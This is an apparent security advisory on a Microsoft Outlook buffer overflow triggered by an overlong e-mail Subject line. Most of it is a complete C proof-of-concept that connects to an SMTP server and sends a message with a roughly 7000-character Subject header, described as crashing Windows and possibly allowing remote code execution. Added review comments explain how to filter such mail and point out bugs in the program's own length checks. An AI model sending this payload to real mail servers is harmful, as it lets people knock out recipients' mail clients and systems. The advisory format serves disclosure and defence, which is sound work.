COMMAND

    Outlook

SYSTEMS AFFECTED

    Systems using Outlook (Windows; other platforms unknown)

PROBLEM

    Rockme Security Research Laboratory found the following.  When
    Microsoft Outlook reads the subject of an e-mail, it places it in
    a buffer of about 5000 characters and does not check the size of
    the received subject!  The program below only crashes Windows.
    Remote command execution also seems possible.  Some people have
    said that when you overwrite Outlook's buffer, Windows overwrites
    the swap space and then becomes unusable, but there is nothing
    like that yet.  Exploit follows:

    /*
     rockme@altern.org

     */
     /* Greeting to Zyrtex, Next, Clement and everyone i know :p            */
     /*             Have fun ! and remember, no bad use :)                  */
     /* let's start */

    #include <stdio.h>
    #include <strings.h>
    #include <errno.h>
    #include <signal.h>
    #include <sys/syscall.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>

    struct in_addr
    resolv(char *name)
    {
      static struct in_addr in;
      unsigned long l;
      struct hostent *ent;

      if((l = inet_addr (name)) != INADDR_NONE)
        {
          in.s_addr = l;
          return in;
        }
      if(!(ent = gethostbyname (name)))
        {
          in.s_addr = INADDR_NONE;
          return in;
        }
      return *(struct in_addr *) ent->h_addr;
    }

       char buf[70000];
       char server[5000];
       char mailfrom[5000];
       char rcptto[5000];

    /*
     * Proof-of-concept for the advisory above: opens a TCP connection to port 25
     * on argv[1] and submits one SMTP message whose Subject header line carries
     * 6999 'X' characters, i.e. longer than the ~5000-character buffer the
     * advisory describes.
     *
     * Arguments: argv[1] = mail server (also used as the HELO argument),
     *            argv[2] = envelope sender, argv[3] = envelope recipient.
     *
     * What the message looks like on the wire, for anyone writing a filter or
     * reviewing mail logs: a single header line of roughly 7000 bytes in an
     * otherwise tiny message.  A mail gateway or MTA that enforces a maximum
     * header line length (RFC 5322 caps lines at 998 characters) would typically
     * reject or fold such a line before it reaches the mail client.
     *
     * No return value from socket(), connect(), write() or read() is checked,
     * and SMTP replies are not read between commands; the program only sleeps
     * between writes and prints whatever the server returned at the very end.
     */
    main (int argc, char *argv[])
    {
      struct sockaddr_in addr;
      int i, s;
      char c;          /* unused; only referenced by the commented-out read below */
      int port=25;     /* SMTP */


     /* NOTE(review): this admits argc == 3, yet argv[3] is read below; with only
        two arguments argv[3] is the terminating NULL pointer and strlen() on it
        is undefined behaviour.  The check presumably should be argc < 4. */
     if(argc < 3){
     printf("\n Usage : %s mail_server sender recipient \n\n", argv[0]);
     printf(" Warning this program do not spoof your IP adress !\n\n");
     exit(0);
     }

     /* Length limits intended to keep the sprintf() calls below inside the
        5000-byte command buffers. */
     if(strlen(argv[1]) > 4990){
     printf("Sorry mailserver is too big .\n");
     exit(0);
     }

     if(strlen(argv[2]) > 4990){
     printf("Sorry sender is too big .\n");
     exit(0);
     }

     if(strlen(argv[3]) > 4990){
     printf("Sorry recipient is too big .\n");
     exit(0);
     }

     /*  Mwarf, my program is protected from buffer overflow attacks :) */
     /* NOTE(review): not quite.  A 4990-character argument still passes the
        checks above, and "MAIL FROM: " (11 chars) + 4990 + '\n' + NUL needs 5003
        bytes, "RCPT TO: " (9 chars) + 4990 + '\n' + NUL needs 5001; both exceed
        the 5000-byte destination.  snprintf() with sizeof would bound this. */

     printf("\nRockme Security Research Laboratory !\n\n\n");
     printf("Microsoft Outlook Denial of Service !\n");
     /* French: "Please wait about 20 seconds, depending on the server's speed" */
     printf("Veuillez patienter environ 20 secondes suivant la vitesse du serveur ...\n");

     /* Pre-format the three envelope commands; lines end in a bare "\n". */
     sprintf(server, "HELO %s\n", argv[1]);
     sprintf(mailfrom, "MAIL FROM: %s\n", argv[2]);
     sprintf(rcptto, "RCPT TO: %s\n", argv[3]);

      /* resolv() reports failure as INADDR_NONE; that case is not tested here,
         and neither is the result of socket() or connect(). */
      s = socket(AF_INET, SOCK_STREAM, 0);
      addr.sin_family = AF_INET;
      addr.sin_addr = resolv(argv[1]);
      addr.sin_port = htons(port);
      connect(s, (struct sockaddr *) &addr, sizeof (addr));

    /* SMTP envelope, paced with one-second sleeps instead of reading replies. */
    write(s, server, strlen(server));
    sleep(1);

    write(s, mailfrom, strlen(mailfrom));
    sleep(1);

    write(s, rcptto, strlen(rcptto));
    sleep(1);

    write(s, "data\n", 5);
    sleep(1);

    /* Start of the message headers: the Subject field name. */
    write(s, "Subject : ", 10);
    sleep(1);

    /* The oversized header value: i runs 1..6999, so 6999 single-byte writes
       extend the Subject line past the ~5000-character buffer in the advisory. */
    for(i = 1; i < 7000; i++){
    write(s, "X", 1);
    }
    sleep(3);

    /* End of the Subject line. */
    write(s, "\n", 1);
    sleep(1);

    /* One short line of message text ("bonjour" = "hello"). */
    write(s, "bonjour\n", 8);
    sleep(1);

    /* Lone "." ends the DATA section, then the session is closed with quit. */
    write(s, ".\n", 2);
    sleep(1);

    write(s, "quit\n", 5);
    sleep(1);

    /* Single read of at most 69000 bytes into the zero-filled 70000-byte global,
       so the "%s" below always finds a terminator; the byte count is ignored. */
    read(s, buf, 69000); /* read (s, &c, 1); */
    printf("%s", buf);

    printf("\n");

    }

SOLUTION

    Nothing yet.